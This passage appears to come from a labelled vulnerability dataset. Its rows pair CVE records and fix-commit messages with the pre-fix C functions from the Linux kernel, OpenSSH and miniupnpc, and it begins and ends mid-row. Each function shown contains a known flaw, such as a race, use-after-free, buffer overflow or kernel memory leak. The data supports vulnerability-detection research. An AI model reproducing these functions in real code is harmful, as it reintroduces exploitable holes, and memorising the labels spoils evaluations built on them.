] | CVE-2015-7613 | Race condition in the IPC object implementation in the Linux kernel through 4.2.3 allows local users to gain privileges by triggering an ipc_addid call that leads to uid and gid comparisons against uninitialized data, related to msg.c, shm.c, and util.c. | https://nvd.nist.gov/vuln/detail/CVE-2015-7613 |
1,438 | linux | b9a532277938798b53178d5a66af6e2915cb27cf | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/b9a532277938798b53178d5a66af6e2915cb27cf | Initialize msg/shm IPC objects before doing ipc_addid()
As reported by Dmitry Vyukov, we really shouldn't do ipc_addid() before
having initialized the IPC object state. Yes, we initialize the IPC
object in a locked state, but with all the lockless RCU lookup work,
that IPC object lock no longer means that the state cannot be seen.
We already did this for the IPC semaphore code (see commit e8577d1f0329:
"ipc/sem.c: fully initialize sem_array before making it visible") but we
clearly forgot about msg and shm.
Reported-by: Dmitry Vyukov <dvyukov@google.com>
Cc: Manfred Spraul <manfred@colorfullife.com>
Cc: Davidlohr Bueso <dbueso@suse.de>
Cc: stable@vger.kernel.org
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> | 1 | static int newseg(struct ipc_namespace *ns, struct ipc_params *params)
{
key_t key = params->key;
int shmflg = params->flg;
size_t size = params->u.size;
int error;
struct shmid_kernel *shp;
size_t numpages = (size + PAGE_SIZE - 1) >> PAGE_SHIFT;
struct file *file;
char name[13];
int id;
vm_flags_t acctflag = 0;
if (size < SHMMIN || size > ns->shm_ctlmax)
return -EINVAL;
if (numpages << PAGE_SHIFT < size)
return -ENOSPC;
if (ns->shm_tot + numpages < ns->shm_tot ||
ns->shm_tot + numpages > ns->shm_ctlall)
return -ENOSPC;
shp = ipc_rcu_alloc(sizeof(*shp));
if (!shp)
return -ENOMEM;
shp->shm_perm.key = key;
shp->shm_perm.mode = (shmflg & S_IRWXUGO);
shp->mlock_user = NULL;
shp->shm_perm.security = NULL;
error = security_shm_alloc(shp);
if (error) {
ipc_rcu_putref(shp, ipc_rcu_free);
return error;
}
sprintf(name, "SYSV%08x", key);
if (shmflg & SHM_HUGETLB) {
struct hstate *hs;
size_t hugesize;
hs = hstate_sizelog((shmflg >> SHM_HUGE_SHIFT) & SHM_HUGE_MASK);
if (!hs) {
error = -EINVAL;
goto no_file;
}
hugesize = ALIGN(size, huge_page_size(hs));
/* hugetlb_file_setup applies strict accounting */
if (shmflg & SHM_NORESERVE)
acctflag = VM_NORESERVE;
file = hugetlb_file_setup(name, hugesize, acctflag,
&shp->mlock_user, HUGETLB_SHMFS_INODE,
(shmflg >> SHM_HUGE_SHIFT) & SHM_HUGE_MASK);
} else {
/*
* Do not allow no accounting for OVERCOMMIT_NEVER, even
* if it's asked for.
*/
if ((shmflg & SHM_NORESERVE) &&
sysctl_overcommit_memory != OVERCOMMIT_NEVER)
acctflag = VM_NORESERVE;
file = shmem_kernel_file_setup(name, size, acctflag);
}
error = PTR_ERR(file);
if (IS_ERR(file))
goto no_file;
id = ipc_addid(&shm_ids(ns), &shp->shm_perm, ns->shm_ctlmni);
if (id < 0) {
error = id;
goto no_id;
}
shp->shm_cprid = task_tgid_vnr(current);
shp->shm_lprid = 0;
shp->shm_atim = shp->shm_dtim = 0;
shp->shm_ctim = get_seconds();
shp->shm_segsz = size;
shp->shm_nattch = 0;
shp->shm_file = file;
shp->shm_creator = current;
list_add(&shp->shm_clist, ¤t->sysvshm.shm_clist);
/*
* shmid gets reported as "inode#" in /proc/pid/maps.
* proc-ps tools use this. Changing this will break them.
*/
file_inode(file)->i_ino = shp->shm_perm.id;
ns->shm_tot += numpages;
error = shp->shm_perm.id;
ipc_unlock_object(&shp->shm_perm);
rcu_read_unlock();
return error;
no_id:
if (is_file_hugepages(file) && shp->mlock_user)
user_shm_unlock(size, shp->mlock_user);
fput(file);
no_file:
ipc_rcu_putref(shp, shm_rcu_free);
return error;
}
| 280,625,932,635,716,960,000,000,000,000,000,000,000 | shm.c | 203,233,666,096,037,030,000,000,000,000,000,000,000 | [
"CWE-362"
] | CVE-2015-7613 | Race condition in the IPC object implementation in the Linux kernel through 4.2.3 allows local users to gain privileges by triggering an ipc_addid call that leads to uid and gid comparisons against uninitialized data, related to msg.c, shm.c, and util.c. | https://nvd.nist.gov/vuln/detail/CVE-2015-7613 |
1,439 | linux | b9a532277938798b53178d5a66af6e2915cb27cf | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/b9a532277938798b53178d5a66af6e2915cb27cf | Initialize msg/shm IPC objects before doing ipc_addid()
As reported by Dmitry Vyukov, we really shouldn't do ipc_addid() before
having initialized the IPC object state. Yes, we initialize the IPC
object in a locked state, but with all the lockless RCU lookup work,
that IPC object lock no longer means that the state cannot be seen.
We already did this for the IPC semaphore code (see commit e8577d1f0329:
"ipc/sem.c: fully initialize sem_array before making it visible") but we
clearly forgot about msg and shm.
Reported-by: Dmitry Vyukov <dvyukov@google.com>
Cc: Manfred Spraul <manfred@colorfullife.com>
Cc: Davidlohr Bueso <dbueso@suse.de>
Cc: stable@vger.kernel.org
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org> | 1 | int ipc_addid(struct ipc_ids *ids, struct kern_ipc_perm *new, int size)
{
kuid_t euid;
kgid_t egid;
int id;
int next_id = ids->next_id;
if (size > IPCMNI)
size = IPCMNI;
if (ids->in_use >= size)
return -ENOSPC;
idr_preload(GFP_KERNEL);
spin_lock_init(&new->lock);
new->deleted = false;
rcu_read_lock();
spin_lock(&new->lock);
id = idr_alloc(&ids->ipcs_idr, new,
(next_id < 0) ? 0 : ipcid_to_idx(next_id), 0,
GFP_NOWAIT);
idr_preload_end();
if (id < 0) {
spin_unlock(&new->lock);
rcu_read_unlock();
return id;
}
ids->in_use++;
current_euid_egid(&euid, &egid);
new->cuid = new->uid = euid;
new->gid = new->cgid = egid;
if (next_id < 0) {
new->seq = ids->seq++;
if (ids->seq > IPCID_SEQ_MAX)
ids->seq = 0;
} else {
new->seq = ipcid_to_seqx(next_id);
ids->next_id = -1;
}
new->id = ipc_buildid(id, new->seq);
return id;
}
| 260,213,467,137,768,860,000,000,000,000,000,000,000 | util.c | 249,665,259,441,201,800,000,000,000,000,000,000,000 | [
"CWE-362"
] | CVE-2015-7613 | Race condition in the IPC object implementation in the Linux kernel through 4.2.3 allows local users to gain privileges by triggering an ipc_addid call that leads to uid and gid comparisons against uninitialized data, related to msg.c, shm.c, and util.c. | https://nvd.nist.gov/vuln/detail/CVE-2015-7613 |
1,441 | linux | 74e98eb085889b0d2d4908f59f6e00026063014f | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/74e98eb085889b0d2d4908f59f6e00026063014f | RDS: verify the underlying transport exists before creating a connection
There was no verification that an underlying transport exists when creating
a connection, this would cause dereferencing a NULL ptr.
It might happen on sockets that weren't properly bound before attempting to
send a message, which will cause a NULL ptr deref:
[135546.047719] kasan: GPF could be caused by NULL-ptr deref or user memory accessgeneral protection fault: 0000 [#1] PREEMPT SMP DEBUG_PAGEALLOC KASAN
[135546.051270] Modules linked in:
[135546.051781] CPU: 4 PID: 15650 Comm: trinity-c4 Not tainted 4.2.0-next-20150902-sasha-00041-gbaa1222-dirty #2527
[135546.053217] task: ffff8800835bc000 ti: ffff8800bc708000 task.ti: ffff8800bc708000
[135546.054291] RIP: __rds_conn_create (net/rds/connection.c:194)
[135546.055666] RSP: 0018:ffff8800bc70fab0 EFLAGS: 00010202
[135546.056457] RAX: dffffc0000000000 RBX: 0000000000000f2c RCX: ffff8800835bc000
[135546.057494] RDX: 0000000000000007 RSI: ffff8800835bccd8 RDI: 0000000000000038
[135546.058530] RBP: ffff8800bc70fb18 R08: 0000000000000001 R09: 0000000000000000
[135546.059556] R10: ffffed014d7a3a23 R11: ffffed014d7a3a21 R12: 0000000000000000
[135546.060614] R13: 0000000000000001 R14: ffff8801ec3d0000 R15: 0000000000000000
[135546.061668] FS: 00007faad4ffb700(0000) GS:ffff880252000000(0000) knlGS:0000000000000000
[135546.062836] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b
[135546.063682] CR2: 000000000000846a CR3: 000000009d137000 CR4: 00000000000006a0
[135546.064723] Stack:
[135546.065048] ffffffffafe2055c ffffffffafe23fc1 ffffed00493097bf ffff8801ec3d0008
[135546.066247] 0000000000000000 00000000000000d0 0000000000000000 ac194a24c0586342
[135546.067438] 1ffff100178e1f78 ffff880320581b00 ffff8800bc70fdd0 ffff880320581b00
[135546.068629] Call Trace:
[135546.069028] ? __rds_conn_create (include/linux/rcupdate.h:856 net/rds/connection.c:134)
[135546.069989] ? rds_message_copy_from_user (net/rds/message.c:298)
[135546.071021] rds_conn_create_outgoing (net/rds/connection.c:278)
[135546.071981] rds_sendmsg (net/rds/send.c:1058)
[135546.072858] ? perf_trace_lock (include/trace/events/lock.h:38)
[135546.073744] ? lockdep_init (kernel/locking/lockdep.c:3298)
[135546.074577] ? rds_send_drop_to (net/rds/send.c:976)
[135546.075508] ? __might_fault (./arch/x86/include/asm/current.h:14 mm/memory.c:3795)
[135546.076349] ? __might_fault (mm/memory.c:3795)
[135546.077179] ? rds_send_drop_to (net/rds/send.c:976)
[135546.078114] sock_sendmsg (net/socket.c:611 net/socket.c:620)
[135546.078856] SYSC_sendto (net/socket.c:1657)
[135546.079596] ? SYSC_connect (net/socket.c:1628)
[135546.080510] ? trace_dump_stack (kernel/trace/trace.c:1926)
[135546.081397] ? ring_buffer_unlock_commit (kernel/trace/ring_buffer.c:2479 kernel/trace/ring_buffer.c:2558 kernel/trace/ring_buffer.c:2674)
[135546.082390] ? trace_buffer_unlock_commit (kernel/trace/trace.c:1749)
[135546.083410] ? trace_event_raw_event_sys_enter (include/trace/events/syscalls.h:16)
[135546.084481] ? do_audit_syscall_entry (include/trace/events/syscalls.h:16)
[135546.085438] ? trace_buffer_unlock_commit (kernel/trace/trace.c:1749)
[135546.085515] rds_ib_laddr_check(): addr 36.74.25.172 ret -99 node type -1
Acked-by: Santosh Shilimkar <santosh.shilimkar@oracle.com>
Signed-off-by: Sasha Levin <sasha.levin@oracle.com>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | static struct rds_connection *__rds_conn_create(struct net *net,
__be32 laddr, __be32 faddr,
struct rds_transport *trans, gfp_t gfp,
int is_outgoing)
{
struct rds_connection *conn, *parent = NULL;
struct hlist_head *head = rds_conn_bucket(laddr, faddr);
struct rds_transport *loop_trans;
unsigned long flags;
int ret;
struct rds_transport *otrans = trans;
if (!is_outgoing && otrans->t_type == RDS_TRANS_TCP)
goto new_conn;
rcu_read_lock();
conn = rds_conn_lookup(net, head, laddr, faddr, trans);
if (conn && conn->c_loopback && conn->c_trans != &rds_loop_transport &&
laddr == faddr && !is_outgoing) {
/* This is a looped back IB connection, and we're
* called by the code handling the incoming connect.
* We need a second connection object into which we
* can stick the other QP. */
parent = conn;
conn = parent->c_passive;
}
rcu_read_unlock();
if (conn)
goto out;
new_conn:
conn = kmem_cache_zalloc(rds_conn_slab, gfp);
if (!conn) {
conn = ERR_PTR(-ENOMEM);
goto out;
}
INIT_HLIST_NODE(&conn->c_hash_node);
conn->c_laddr = laddr;
conn->c_faddr = faddr;
spin_lock_init(&conn->c_lock);
conn->c_next_tx_seq = 1;
rds_conn_net_set(conn, net);
init_waitqueue_head(&conn->c_waitq);
INIT_LIST_HEAD(&conn->c_send_queue);
INIT_LIST_HEAD(&conn->c_retrans);
ret = rds_cong_get_maps(conn);
if (ret) {
kmem_cache_free(rds_conn_slab, conn);
conn = ERR_PTR(ret);
goto out;
}
/*
* This is where a connection becomes loopback. If *any* RDS sockets
* can bind to the destination address then we'd rather the messages
* flow through loopback rather than either transport.
*/
loop_trans = rds_trans_get_preferred(net, faddr);
if (loop_trans) {
rds_trans_put(loop_trans);
conn->c_loopback = 1;
if (is_outgoing && trans->t_prefer_loopback) {
/* "outgoing" connection - and the transport
* says it wants the connection handled by the
* loopback transport. This is what TCP does.
*/
trans = &rds_loop_transport;
}
}
conn->c_trans = trans;
ret = trans->conn_alloc(conn, gfp);
if (ret) {
kmem_cache_free(rds_conn_slab, conn);
conn = ERR_PTR(ret);
goto out;
}
atomic_set(&conn->c_state, RDS_CONN_DOWN);
conn->c_send_gen = 0;
conn->c_reconnect_jiffies = 0;
INIT_DELAYED_WORK(&conn->c_send_w, rds_send_worker);
INIT_DELAYED_WORK(&conn->c_recv_w, rds_recv_worker);
INIT_DELAYED_WORK(&conn->c_conn_w, rds_connect_worker);
INIT_WORK(&conn->c_down_w, rds_shutdown_worker);
mutex_init(&conn->c_cm_lock);
conn->c_flags = 0;
rdsdebug("allocated conn %p for %pI4 -> %pI4 over %s %s\n",
conn, &laddr, &faddr,
trans->t_name ? trans->t_name : "[unknown]",
is_outgoing ? "(outgoing)" : "");
/*
* Since we ran without holding the conn lock, someone could
* have created the same conn (either normal or passive) in the
* interim. We check while holding the lock. If we won, we complete
* init and return our conn. If we lost, we rollback and return the
* other one.
*/
spin_lock_irqsave(&rds_conn_lock, flags);
if (parent) {
/* Creating passive conn */
if (parent->c_passive) {
trans->conn_free(conn->c_transport_data);
kmem_cache_free(rds_conn_slab, conn);
conn = parent->c_passive;
} else {
parent->c_passive = conn;
rds_cong_add_conn(conn);
rds_conn_count++;
}
} else {
/* Creating normal conn */
struct rds_connection *found;
if (!is_outgoing && otrans->t_type == RDS_TRANS_TCP)
found = NULL;
else
found = rds_conn_lookup(net, head, laddr, faddr, trans);
if (found) {
trans->conn_free(conn->c_transport_data);
kmem_cache_free(rds_conn_slab, conn);
conn = found;
} else {
if ((is_outgoing && otrans->t_type == RDS_TRANS_TCP) ||
(otrans->t_type != RDS_TRANS_TCP)) {
/* Only the active side should be added to
* reconnect list for TCP.
*/
hlist_add_head_rcu(&conn->c_hash_node, head);
}
rds_cong_add_conn(conn);
rds_conn_count++;
}
}
spin_unlock_irqrestore(&rds_conn_lock, flags);
out:
return conn;
}
| 192,605,127,811,959,800,000,000,000,000,000,000,000 | connection.c | 228,446,343,956,843,780,000,000,000,000,000,000,000 | [
"CWE-703"
] | CVE-2015-6937 | The __rds_conn_create function in net/rds/connection.c in the Linux kernel through 4.2.3 allows local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact by using a socket that was not properly bound. | https://nvd.nist.gov/vuln/detail/CVE-2015-6937 |
1,442 | openssh-portable | 5e75f5198769056089fb06c4d738ab0e5abc66f7 | https://github.com/openssh/openssh-portable | https://github.com/openssh/openssh-portable/commit/5e75f5198769056089fb06c4d738ab0e5abc66f7 | set sshpam_ctxt to NULL after free
Avoids use-after-free in monitor when privsep child is compromised.
Reported by Moritz Jodeit; ok dtucker@ | 1 | mm_answer_pam_free_ctx(int sock, Buffer *m)
{
debug3("%s", __func__);
(sshpam_device.free_ctx)(sshpam_ctxt);
buffer_clear(m);
mm_request_send(sock, MONITOR_ANS_PAM_FREE_CTX, m);
auth_method = "keyboard-interactive";
auth_submethod = "pam";
return (sshpam_authok == sshpam_ctxt);
}
| 205,096,995,958,077,860,000,000,000,000,000,000,000 | monitor.c | 314,905,608,812,230,500,000,000,000,000,000,000,000 | [
"CWE-264"
] | CVE-2015-6564 | Use-after-free vulnerability in the mm_answer_pam_free_ctx function in monitor.c in sshd in OpenSSH before 7.0 on non-OpenBSD platforms might allow local users to gain privileges by leveraging control of the sshd uid to send an unexpectedly early MONITOR_REQ_PAM_FREE_CTX request. | https://nvd.nist.gov/vuln/detail/CVE-2015-6564 |
1,443 | openssh-portable | d4697fe9a28dab7255c60433e4dd23cf7fce8a8b | https://github.com/openssh/openssh-portable | https://github.com/openssh/openssh-portable/commit/d4697fe9a28dab7255c60433e4dd23cf7fce8a8b | Don't resend username to PAM; it already has it.
Pointed out by Moritz Jodeit; ok dtucker@ | 1 | mm_answer_pam_init_ctx(int sock, Buffer *m)
{
debug3("%s", __func__);
authctxt->user = buffer_get_string(m, NULL);
sshpam_ctxt = (sshpam_device.init_ctx)(authctxt);
sshpam_authok = NULL;
buffer_clear(m);
if (sshpam_ctxt != NULL) {
monitor_permit(mon_dispatch, MONITOR_REQ_PAM_FREE_CTX, 1);
buffer_put_int(m, 1);
} else {
buffer_put_int(m, 0);
}
mm_request_send(sock, MONITOR_ANS_PAM_INIT_CTX, m);
return (0);
}
| 77,335,835,840,341,280,000,000,000,000,000,000,000 | monitor.c | 287,714,491,034,327,250,000,000,000,000,000,000,000 | [
"CWE-20"
] | CVE-2015-6563 | The monitor component in sshd in OpenSSH before 7.0 on non-OpenBSD platforms accepts extraneous username data in MONITOR_REQ_PAM_INIT_CTX requests, which allows local users to conduct impersonation attacks by leveraging any SSH login access in conjunction with control of the sshd uid to send a crafted MONITOR_REQ_PWNAM request, related to monitor.c and monitor_wrap.c. | https://nvd.nist.gov/vuln/detail/CVE-2015-6563 |
1,444 | openssh-portable | d4697fe9a28dab7255c60433e4dd23cf7fce8a8b | https://github.com/openssh/openssh-portable | https://github.com/openssh/openssh-portable/commit/d4697fe9a28dab7255c60433e4dd23cf7fce8a8b | Don't resend username to PAM; it already has it.
Pointed out by Moritz Jodeit; ok dtucker@ | 1 | mm_sshpam_init_ctx(Authctxt *authctxt)
{
Buffer m;
int success;
debug3("%s", __func__);
buffer_init(&m);
buffer_put_cstring(&m, authctxt->user);
mm_request_send(pmonitor->m_recvfd, MONITOR_REQ_PAM_INIT_CTX, &m);
debug3("%s: waiting for MONITOR_ANS_PAM_INIT_CTX", __func__);
mm_request_receive_expect(pmonitor->m_recvfd, MONITOR_ANS_PAM_INIT_CTX, &m);
success = buffer_get_int(&m);
if (success == 0) {
debug3("%s: pam_init_ctx failed", __func__);
buffer_free(&m);
return (NULL);
}
buffer_free(&m);
return (authctxt);
}
| 6,266,967,114,205,273,000,000,000,000,000,000,000 | monitor_wrap.c | 201,186,186,210,011,480,000,000,000,000,000,000,000 | [
"CWE-20"
] | CVE-2015-6563 | The monitor component in sshd in OpenSSH before 7.0 on non-OpenBSD platforms accepts extraneous username data in MONITOR_REQ_PAM_INIT_CTX requests, which allows local users to conduct impersonation attacks by leveraging any SSH login access in conjunction with control of the sshd uid to send a crafted MONITOR_REQ_PWNAM request, related to monitor.c and monitor_wrap.c. | https://nvd.nist.gov/vuln/detail/CVE-2015-6563 |
1,445 | linux | 9a5cbce421a283e6aea3c4007f141735bf9da8c3 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/9a5cbce421a283e6aea3c4007f141735bf9da8c3 | powerpc/perf: Cap 64bit userspace backtraces to PERF_MAX_STACK_DEPTH
We cap 32bit userspace backtraces to PERF_MAX_STACK_DEPTH
(currently 127), but we forgot to do the same for 64bit backtraces.
Cc: stable@vger.kernel.org
Signed-off-by: Anton Blanchard <anton@samba.org>
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au> | 1 | static void perf_callchain_user_64(struct perf_callchain_entry *entry,
struct pt_regs *regs)
{
unsigned long sp, next_sp;
unsigned long next_ip;
unsigned long lr;
long level = 0;
struct signal_frame_64 __user *sigframe;
unsigned long __user *fp, *uregs;
next_ip = perf_instruction_pointer(regs);
lr = regs->link;
sp = regs->gpr[1];
perf_callchain_store(entry, next_ip);
for (;;) {
fp = (unsigned long __user *) sp;
if (!valid_user_sp(sp, 1) || read_user_stack_64(fp, &next_sp))
return;
if (level > 0 && read_user_stack_64(&fp[2], &next_ip))
return;
/*
* Note: the next_sp - sp >= signal frame size check
* is true when next_sp < sp, which can happen when
* transitioning from an alternate signal stack to the
* normal stack.
*/
if (next_sp - sp >= sizeof(struct signal_frame_64) &&
(is_sigreturn_64_address(next_ip, sp) ||
(level <= 1 && is_sigreturn_64_address(lr, sp))) &&
sane_signal_64_frame(sp)) {
/*
* This looks like an signal frame
*/
sigframe = (struct signal_frame_64 __user *) sp;
uregs = sigframe->uc.uc_mcontext.gp_regs;
if (read_user_stack_64(&uregs[PT_NIP], &next_ip) ||
read_user_stack_64(&uregs[PT_LNK], &lr) ||
read_user_stack_64(&uregs[PT_R1], &sp))
return;
level = 0;
perf_callchain_store(entry, PERF_CONTEXT_USER);
perf_callchain_store(entry, next_ip);
continue;
}
if (level == 0)
next_ip = lr;
perf_callchain_store(entry, next_ip);
++level;
sp = next_sp;
}
}
| 223,862,452,787,017,050,000,000,000,000,000,000,000 | callchain.c | 29,252,321,502,543,094,000,000,000,000,000,000,000 | [
"CWE-399"
] | CVE-2015-6526 | The perf_callchain_user_64 function in arch/powerpc/perf/callchain.c in the Linux kernel before 4.0.2 on ppc64 platforms allows local users to cause a denial of service (infinite loop) via a deep 64-bit userspace backtrace. | https://nvd.nist.gov/vuln/detail/CVE-2015-6526 |
1,449 | linux | 7932c0bd7740f4cd2aa168d3ce0199e7af7d72d5 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/7932c0bd7740f4cd2aa168d3ce0199e7af7d72d5 | vhost: actually track log eventfd file
While reviewing vhost log code, I found out that log_file is never
set. Note: I haven't tested the change (QEMU doesn't use LOG_FD yet).
Cc: stable@vger.kernel.org
Signed-off-by: Marc-André Lureau <marcandre.lureau@redhat.com>
Signed-off-by: Michael S. Tsirkin <mst@redhat.com> | 1 | long vhost_dev_ioctl(struct vhost_dev *d, unsigned int ioctl, void __user *argp)
{
struct file *eventfp, *filep = NULL;
struct eventfd_ctx *ctx = NULL;
u64 p;
long r;
int i, fd;
/* If you are not the owner, you can become one */
if (ioctl == VHOST_SET_OWNER) {
r = vhost_dev_set_owner(d);
goto done;
}
/* You must be the owner to do anything else */
r = vhost_dev_check_owner(d);
if (r)
goto done;
switch (ioctl) {
case VHOST_SET_MEM_TABLE:
r = vhost_set_memory(d, argp);
break;
case VHOST_SET_LOG_BASE:
if (copy_from_user(&p, argp, sizeof p)) {
r = -EFAULT;
break;
}
if ((u64)(unsigned long)p != p) {
r = -EFAULT;
break;
}
for (i = 0; i < d->nvqs; ++i) {
struct vhost_virtqueue *vq;
void __user *base = (void __user *)(unsigned long)p;
vq = d->vqs[i];
mutex_lock(&vq->mutex);
/* If ring is inactive, will check when it's enabled. */
if (vq->private_data && !vq_log_access_ok(vq, base))
r = -EFAULT;
else
vq->log_base = base;
mutex_unlock(&vq->mutex);
}
break;
case VHOST_SET_LOG_FD:
r = get_user(fd, (int __user *)argp);
if (r < 0)
break;
eventfp = fd == -1 ? NULL : eventfd_fget(fd);
if (IS_ERR(eventfp)) {
r = PTR_ERR(eventfp);
break;
}
if (eventfp != d->log_file) {
filep = d->log_file;
ctx = d->log_ctx;
d->log_ctx = eventfp ?
eventfd_ctx_fileget(eventfp) : NULL;
} else
filep = eventfp;
for (i = 0; i < d->nvqs; ++i) {
mutex_lock(&d->vqs[i]->mutex);
d->vqs[i]->log_ctx = d->log_ctx;
mutex_unlock(&d->vqs[i]->mutex);
}
if (ctx)
eventfd_ctx_put(ctx);
if (filep)
fput(filep);
break;
default:
r = -ENOIOCTLCMD;
break;
}
done:
return r;
}
| 259,350,127,464,630,780,000,000,000,000,000,000,000 | vhost.c | 299,385,267,607,711,380,000,000,000,000,000,000,000 | [
"CWE-399"
] | CVE-2015-6252 | The vhost_dev_ioctl function in drivers/vhost/vhost.c in the Linux kernel before 4.1.5 allows local users to cause a denial of service (memory consumption) via a VHOST_SET_LOG_FD ioctl call that triggers permanent file-descriptor allocation. | https://nvd.nist.gov/vuln/detail/CVE-2015-6252 |
1,450 | miniupnp | 79cca974a4c2ab1199786732a67ff6d898051b78 | https://github.com/miniupnp/miniupnp | https://github.com/miniupnp/miniupnp/commit/79cca974a4c2ab1199786732a67ff6d898051b78 | igd_desc_parse.c: fix buffer overflow | 1 | void IGDstartelt(void * d, const char * name, int l)
{
struct IGDdatas * datas = (struct IGDdatas *)d;
memcpy( datas->cureltname, name, l);
datas->cureltname[l] = '\0';
datas->level++;
if( (l==7) && !memcmp(name, "service", l) ) {
datas->tmp.controlurl[0] = '\0';
datas->tmp.eventsuburl[0] = '\0';
datas->tmp.scpdurl[0] = '\0';
datas->tmp.servicetype[0] = '\0';
}
}
| 81,376,760,744,966,150,000,000,000,000,000,000,000 | igd_desc_parse.c | 340,208,766,696,793,100,000,000,000,000,000,000,000 | [
"CWE-119"
] | CVE-2015-6031 | Buffer overflow in the IGDstartelt function in igd_desc_parse.c in the MiniUPnP client (aka MiniUPnPc) before 1.9.20150917 allows remote UPNP servers to cause a denial of service (application crash) and possibly execute arbitrary code via an "oversized" XML element name. | https://nvd.nist.gov/vuln/detail/CVE-2015-6031 |
1,451 | linux | f15133df088ecadd141ea1907f2c96df67c729f0 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/f15133df088ecadd141ea1907f2c96df67c729f0 | path_openat(): fix double fput()
path_openat() jumps to the wrong place after do_tmpfile() - it has
already done path_cleanup() (as part of path_lookupat() called by
do_tmpfile()), so doing that again can lead to double fput().
Cc: stable@vger.kernel.org # v3.11+
Signed-off-by: Al Viro <viro@zeniv.linux.org.uk> | 1 | static struct file *path_openat(int dfd, struct filename *pathname,
struct nameidata *nd, const struct open_flags *op, int flags)
{
struct file *file;
struct path path;
int opened = 0;
int error;
file = get_empty_filp();
if (IS_ERR(file))
return file;
file->f_flags = op->open_flag;
if (unlikely(file->f_flags & __O_TMPFILE)) {
error = do_tmpfile(dfd, pathname, nd, flags, op, file, &opened);
goto out;
}
error = path_init(dfd, pathname, flags, nd);
if (unlikely(error))
goto out;
error = do_last(nd, &path, file, op, &opened, pathname);
while (unlikely(error > 0)) { /* trailing symlink */
struct path link = path;
void *cookie;
if (!(nd->flags & LOOKUP_FOLLOW)) {
path_put_conditional(&path, nd);
path_put(&nd->path);
error = -ELOOP;
break;
}
error = may_follow_link(&link, nd);
if (unlikely(error))
break;
nd->flags |= LOOKUP_PARENT;
nd->flags &= ~(LOOKUP_OPEN|LOOKUP_CREATE|LOOKUP_EXCL);
error = follow_link(&link, nd, &cookie);
if (unlikely(error))
break;
error = do_last(nd, &path, file, op, &opened, pathname);
put_link(nd, &link, cookie);
}
out:
path_cleanup(nd);
if (!(opened & FILE_OPENED)) {
BUG_ON(!error);
put_filp(file);
}
if (unlikely(error)) {
if (error == -EOPENSTALE) {
if (flags & LOOKUP_RCU)
error = -ECHILD;
else
error = -ESTALE;
}
file = ERR_PTR(error);
}
return file;
}
| 75,770,052,784,686,880,000,000,000,000,000,000,000 | namei.c | 323,949,164,317,720,170,000,000,000,000,000,000,000 | [
"CWE-416"
] | CVE-2015-5706 | Use-after-free vulnerability in the path_openat function in fs/namei.c in the Linux kernel 3.x and 4.x before 4.0.4 allows local users to cause a denial of service or possibly have unspecified other impact via O_TMPFILE filesystem operations that leverage a duplicate cleanup operation. | https://nvd.nist.gov/vuln/detail/CVE-2015-5706 |
1,452 | linux | b6878d9e03043695dbf3fa1caa6dfc09db225b16 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/b6878d9e03043695dbf3fa1caa6dfc09db225b16 | md: use kzalloc() when bitmap is disabled
In drivers/md/md.c get_bitmap_file() uses kmalloc() for creating a
mdu_bitmap_file_t called "file".
5769 file = kmalloc(sizeof(*file), GFP_NOIO);
5770 if (!file)
5771 return -ENOMEM;
This structure is copied to user space at the end of the function.
5786 if (err == 0 &&
5787 copy_to_user(arg, file, sizeof(*file)))
5788 err = -EFAULT
But if bitmap is disabled only the first byte of "file" is initialized
with zero, so it's possible to read some bytes (up to 4095) of kernel
space memory from user space. This is an information leak.
5775 /* bitmap disabled, zero the first byte and copy out */
5776 if (!mddev->bitmap_info.file)
5777 file->pathname[0] = '\0';
Signed-off-by: Benjamin Randazzo <benjamin@randazzo.fr>
Signed-off-by: NeilBrown <neilb@suse.com> | 1 | static int get_bitmap_file(struct mddev *mddev, void __user * arg)
{
mdu_bitmap_file_t *file = NULL; /* too big for stack allocation */
char *ptr;
int err;
file = kmalloc(sizeof(*file), GFP_NOIO);
if (!file)
return -ENOMEM;
err = 0;
spin_lock(&mddev->lock);
/* bitmap disabled, zero the first byte and copy out */
if (!mddev->bitmap_info.file)
file->pathname[0] = '\0';
else if ((ptr = file_path(mddev->bitmap_info.file,
file->pathname, sizeof(file->pathname))),
IS_ERR(ptr))
err = PTR_ERR(ptr);
else
memmove(file->pathname, ptr,
sizeof(file->pathname)-(ptr-file->pathname));
spin_unlock(&mddev->lock);
if (err == 0 &&
copy_to_user(arg, file, sizeof(*file)))
err = -EFAULT;
kfree(file);
return err;
}
| 233,692,859,281,768,060,000,000,000,000,000,000,000 | md.c | 31,073,914,606,817,860,000,000,000,000,000,000,000 | [
"CWE-200"
] | CVE-2015-5697 | The get_bitmap_file function in drivers/md/md.c in the Linux kernel before 4.1.6 does not initialize a certain bitmap data structure, which allows local users to obtain sensitive information from kernel memory via a GET_BITMAP_FILE ioctl call. | https://nvd.nist.gov/vuln/detail/CVE-2015-5697 |
1,453 | linux | beb39db59d14990e401e235faf66a6b9b31240b0 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/beb39db59d14990e401e235faf66a6b9b31240b0 | udp: fix behavior of wrong checksums
We have two problems in UDP stack related to bogus checksums :
1) We return -EAGAIN to application even if receive queue is not empty.
This breaks applications using edge trigger epoll()
2) Under UDP flood, we can loop forever without yielding to other
processes, potentially hanging the host, especially on non SMP.
This patch is an attempt to make things better.
We might in the future add extra support for rt applications
wanting to better control time spent doing a recv() in a hostile
environment. For example we could validate checksums before queuing
packets in socket receive queue.
Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Willem de Bruijn <willemb@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | int udp_recvmsg(struct sock *sk, struct msghdr *msg, size_t len, int noblock,
int flags, int *addr_len)
{
struct inet_sock *inet = inet_sk(sk);
DECLARE_SOCKADDR(struct sockaddr_in *, sin, msg->msg_name);
struct sk_buff *skb;
unsigned int ulen, copied;
int peeked, off = 0;
int err;
